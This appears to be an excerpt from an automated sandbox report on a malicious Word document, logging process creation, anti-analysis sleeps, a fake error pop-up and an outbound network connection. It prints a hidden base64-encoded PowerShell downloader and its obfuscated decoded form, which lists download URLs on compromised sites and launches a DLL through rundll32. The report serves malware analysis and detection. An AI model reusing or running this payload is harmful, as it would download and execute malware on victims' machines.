Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_001D109C FindFirstFileW,

14_2_001D109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2108564862.00000000002B4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,

7_2_100011C0

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023C4FF mov eax, dword ptr fs:[00000030h]	7_2_0023C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]	8_2_0032C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC4FF mov eax, dword ptr fs:[00000030h]	9_2_001DC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EC4FF mov eax, dword ptr fs:[00000030h]	10_2_007EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038C4FF mov eax, dword ptr fs:[00000030h]	11_2_0038C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C4FF mov eax, dword ptr fs:[00000030h]	12_2_0022C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020C4FF mov eax, dword ptr fs:[00000030h]	13_2_0020C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DC4FF mov eax, dword ptr fs:[00000030h]	14_2_001DC4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10001B30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg',Control_RunDLL	Jump to behavior

